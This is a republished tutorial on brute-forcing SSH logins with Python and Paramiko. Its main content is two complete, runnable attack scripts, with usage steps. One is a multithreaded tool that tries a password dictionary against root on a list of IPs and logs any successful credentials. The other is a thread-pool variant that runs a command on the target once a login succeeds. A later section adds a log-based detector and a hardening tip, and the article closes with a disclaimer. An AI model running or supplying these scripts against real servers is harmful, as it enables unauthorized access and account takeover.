How to Perform SSH Brute‑Force Attacks with Python and Paramiko

This tutorial explains the concept of password‑brute‑force, introduces the open‑source sshfucker library and a custom multithreaded Python script that uses Paramiko to enumerate SSH credentials from a dictionary, and provides step‑by‑step code examples and usage instructions while warning against illegal use.

Python Crawling & Data Mining

Brute‑force is a password‑cracking technique that repeatedly tries possible passwords by enumeration.

This article demonstrates how to use Python for SSH brute‑force attacks. It first presents the open‑source sshfucker tool, which wraps the Paramiko library to create SSH client connections and launch multithreaded password trials. Paramiko is a pure‑Python implementation of the SSH2 protocol, supporting client and server modes, SFTP, and all major cipher and hash algorithms. It is popular in Python automation and security tooling.

Install Paramiko:

pip install paramiko

Example sshfucker script (≈70 lines):

#!/usr/bin/python python
# -*- coding: utf-8 -*-

import paramiko, threading, sys, time, os

class SSHThread(threading.Thread):
    def __init__(self, ip, port, timeout, dic, LogFile):
        threading.Thread.__init__(self)
        self.ip = ip
        self.port = port
        self.dict = dic
        self.timeout = timeout
        self.LogFile = LogFile

    def run(self):
        print("Start try ssh => %s" % self.ip)
        username = "root"
        try:
            password = open(self.dict).read().split('\n')
        except:
            print("Open dict file `%s` error" % self.dict)
            exit(1)
        for pwd in password:
            try:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(self.ip, self.port, username, pwd, timeout=self.timeout)
                print("\nIP => %s, Login %s => %s \n" % (self.ip, username, pwd))
                open(self.LogFile, "a").write("[ %s ] IP => %s, port => %d, %s => %s \n" % (
                    time.asctime(time.localtime(time.time())), self.ip, self.port, username, pwd))
                break
            except:
                print("IP => %s, Error %s => %s" % (self.ip, username, pwd))
                pass

def ViolenceSSH(ip, port, timeout, dic, LogFile):
    ssh_scan = SSHThread(ip, port, timeout, dic, LogFile)
    ssh_scan.start()

def main(ipFile, dic, log):
    if ipFile == "-h":
        help()
    try:
        ipText = open(ipFile).read().split('\n')
        for ip in ipText:
            if ip != '':
                time.sleep(0.5)
                threading.Thread(target=ViolenceSSH, args=(ip, 22, 1, dic, log,)).start()
    except:
        print("Open IP list file `%s` error" % ipFile)
        exit(1)

def help():
    print("python ssh.scan.py :\n        修改dict下的ip文件,password按需求修改,然后执行脚本。 \n")
    exit(1)

if __name__ == '__main__':
    fpath = os.path.dirname(os.path.abspath('__file__'))
    ipFile = sys.argv[1] if len(sys.argv) > 1 else fpath + "/dict/ip"
    dic = sys.argv[2] if len(sys.argv) > 2 else fpath + "/dict/password"
    log = sys.argv[3] if len(sys.argv) > 3 else fpath + "/log/sshd"
    try:
        os.system("clear")
        main(ipFile, dic, log)
    except KeyboardInterrupt:
        exit(1)

A more concise custom script using ThreadPoolExecutor:

import sys
import paramiko
import threading
from concurrent.futures import ThreadPoolExecutor

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
is_find = False

def SshCheck(password):
    try:
        ssh.connect("119.23.xx.xx", 22, 'root', password, timeout=1.5)
        stdin, stdout, stderr = ssh.exec_command('df')
        result = stdout.read()
        if result:
            sys.stdout.write('[OK]\t' + password + '\n')
            global is_find
            is_find = True
            exit()
    except Exception as e:
        print(e, "失败!!!")
    finally:
        ssh.close()

filedata = open("pwds.txt", "r")

def run():
    pool = ThreadPoolExecutor(3)
    while True:
        global is_find
        if is_find:
            break
        line = filedata.readline()
        if not line:
            break
        line = line.strip("\n")
        pool.submit(SshCheck, line)

run()

Run the script with:

python sshfucker.py

The password file (e.g., pwds.txt) should contain a list of candidate passwords, one per line.
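Seen from the target, both scripts above leave the same trail in the sshd log: a tight burst of failed password attempts for root from one source address. The following is an added example, not code from the original article or from sshfucker, that flags that pattern in OpenSSH log lines; the log sample is constructed, and the function name, threshold, window and year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches OpenSSH password-auth results (syslog timestamps carry no year).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

# Constructed sample: one dictionary run against root, one ordinary typo by alice.
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[1001]: Failed password for root from 203.0.113.7 port 40001 ssh2
Mar  3 10:00:02 host sshd[1002]: Failed password for root from 203.0.113.7 port 40002 ssh2
Mar  3 10:00:03 host sshd[1003]: Failed password for root from 203.0.113.7 port 40003 ssh2
Mar  3 10:00:04 host sshd[1004]: Failed password for root from 203.0.113.7 port 40004 ssh2
Mar  3 10:00:05 host sshd[1005]: Failed password for root from 203.0.113.7 port 40005 ssh2
Mar  3 10:00:06 host sshd[1006]: Accepted password for root from 203.0.113.7 port 40006 ssh2
Mar  3 10:02:10 host sshd[1010]: Failed password for alice from 198.51.100.20 port 51000 ssh2
Mar  3 10:02:25 host sshd[1011]: Accepted password for alice from 198.51.100.20 port 51001 ssh2
"""

def detect_bruteforce(log_text, threshold=5, window_s=60, year=2024):
    """Return {ip: {...}} for sources with >= threshold failures inside the window."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)          # per-source sliding window of failure times
    report = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        entry = report.setdefault(
            m["ip"], {"failures": 0, "burst": False, "compromised_user": None})
        if m["result"] == "Failed":
            q = recent[m["ip"]]
            q.append(ts)
            while ts - q[0] > window:    # drop failures older than the window
                q.popleft()
            entry["failures"] += 1
            entry["burst"] = entry["burst"] or len(q) >= threshold
        elif entry["burst"]:
            # A success right after a burst means the guessing worked.
            entry["compromised_user"] = m["user"]
    return {ip: e for ip, e in report.items() if e["burst"]}
```

A result with compromised_user set means a password login succeeded after the burst, so that account should be treated as compromised. Setting PermitRootLogin prohibit-password in sshd_config removes the root password login these scripts depend on.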

Disclaimer: This material is provided for educational and research purposes only. Do not use it for illegal activities; unauthorized access to systems is prohibited and may result in legal consequences.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
